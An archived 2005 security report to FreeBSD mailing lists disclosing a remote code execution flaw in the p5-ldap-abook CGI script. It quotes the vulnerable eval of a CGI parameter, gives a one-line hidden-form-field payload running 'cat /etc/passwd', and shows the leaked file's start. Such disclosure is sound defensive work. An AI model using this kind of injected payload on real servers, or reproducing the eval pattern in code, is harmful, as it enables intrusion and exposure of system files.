Date: Fri, 18 Nov 2005 12:55:20 +0300 From: Roman Mashirov <mrj@mrj.spb.ru> To: ports@FreeBSD.org Cc: security@FreeBSD.org Subject: FreeBSD Port: p5-ldap-abook-1.00 Message-ID: <437DA508.8070409@mrj.spb.ru>
next in thread | raw e-mail | index | archive | help
Hi! This cgi script contains remote code exec. In the following code (line 128): my $attr = eval $query->param(entry); script directly evaluates cgi paramter, received form client, so <input type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the following output from script: # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:*:0:0:Charlie &:/root:/bin/csh and so on WBR -- MRJ
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?437DA508.8070409>